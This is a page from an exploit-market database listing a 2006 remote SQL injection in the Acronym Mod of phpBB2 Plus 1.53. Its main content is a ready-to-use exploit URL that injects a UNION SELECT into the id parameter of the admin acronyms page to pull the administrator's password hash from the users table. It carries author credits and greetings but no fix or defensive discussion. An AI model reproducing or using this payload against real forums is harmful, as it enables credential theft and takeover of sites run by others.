[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpBB2 Plus 1.53 (Acronym Mod) Remote SQL Injection Vulnerability

Author
the master
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1335
Category
web applications
Date add
28-12-2006
Platform
unsorted
=================================================================
phpBB2 Plus 1.53 (Acronym Mod) Remote SQL Injection Vulnerability
=================================================================


########################################################################
#  Acronym Mod  v0.9.5  Remote SQL Injection Vulnerability
#
#  Download: http://www.codemonkeyx.net
#
#  Found By: the master
#
########################################################################
#  exploit:
#
# http://[Target]/[Path]/admin/admin_acronyms.php?mode=edit&id=-1%20UNION%20SELECT%20null,user_password,null%20FROM%20phpbb_users%20where%20user_id=2&sid=AdminHash
#
#  Greetz:   Dr Max Virus , Kacper
########################################################################



#  0day.today [2024-07-05]  #